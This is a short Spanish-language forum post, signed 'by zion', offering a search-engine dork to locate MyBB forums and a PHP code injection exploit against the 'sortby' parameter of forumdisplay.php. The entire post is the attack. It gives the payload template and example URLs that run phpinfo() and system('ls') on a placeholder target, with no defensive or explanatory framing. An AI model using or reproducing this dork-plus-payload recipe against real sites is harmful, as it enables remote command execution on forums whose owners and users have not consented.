mi dork: inurl:"forumdisplay.php?fid=" +intext:"MyBB Group"
Exploit:
Código:
'];<comando PHP>;exit;//
Sintaxis:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby=[exploit]
Ejemplos:
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];phpinfo();exit;//
http://www.sitiovulnerable.com/forumdisplay.php?fid=23&sortby='];system('ls');exit;//
by zion
Mi fuente.